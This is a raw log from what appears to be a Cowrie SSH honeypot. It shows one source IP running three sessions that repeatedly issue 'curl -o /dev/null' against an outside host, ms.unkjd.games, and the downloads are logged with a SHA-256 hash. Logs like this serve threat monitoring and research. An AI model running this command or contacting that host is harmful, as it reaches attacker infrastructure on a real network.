{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.860175Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.860731Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.864088Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.866364Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.867397Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.889900Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.890585Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.895264Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.898508Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.900901Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.903748Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.904626Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.906513Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.907326Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.935245Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.937138Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.940553Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.941411Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.946312Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.947481Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.975702Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.977062Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.978175Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.981837Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.982869Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.984783Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.985377Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.988541Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.990975Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.026273Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.027410Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.031975Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.032594Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.034457Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.035239Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.040738Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.046263Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.070630Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.071385Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.075035Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.075629Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.078338Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.080632Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.082395Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.083249Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.113768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.137946Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.138705Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.141524Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.142064Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.147894Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.150061Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.153375Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.154148Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.178072Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.179141Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.179644Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.182700Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.183344Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.186567Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.191168Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.193435Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.193964Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.196918Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.221672Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.222594Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.224539Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.225380Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.231398Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.233901Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.238424Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.255964Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.256713Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.262277Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.265124Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.268820Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.272136Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.291236Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.294503Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
